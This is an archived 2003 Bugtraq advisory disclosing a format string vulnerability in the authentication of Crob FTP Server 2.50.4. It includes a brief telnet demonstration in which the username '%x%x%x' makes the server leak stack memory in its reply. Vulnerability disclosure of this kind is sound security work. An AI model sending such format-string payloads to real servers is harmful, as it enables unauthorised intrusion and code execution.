[30331] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Format String Vulnerability in Crob Ftp Server

daemon@ATHENA.MIT.EDU (Luca Ercoli)
Mon Jun 2 13:16:29 2003

Date: 2 Jun 2003 16:55:10 -0000
Message-ID: <20030602165510.27776.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Luca Ercoli <luca.ercoli@inwind.it>
To: bugtraq@securityfocus.com



Package:        Crob Ftp Server
Auth:		Crob Software Studio (www.crob.net/studio/ftpserver/)
Version: 	2.50.4 Build 228
Vulnerability:  Format String
Risk: 	        High


Vulnerability
Description:

A format string flaw in the authentication process allows remote attackers 
without valid user/pass to execute arbitrary code.


C:\>telnet 192.168.0.1 21

220- Crob FTP Server V2.50.4
220  Welcome to Crob FTP Server

user %x%x%x

331 Password required for 0d1250b70







Luca Ercoli luca.ercoli[at]inwind.it


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[30331] in bugtraq

Format String Vulnerability in Crob Ftp Server

daemon@ATHENA.MIT.EDU (Luca Ercoli)Mon Jun 2 13:16:29 2003

daemon@ATHENA.MIT.EDU (Luca Ercoli)
Mon Jun 2 13:16:29 2003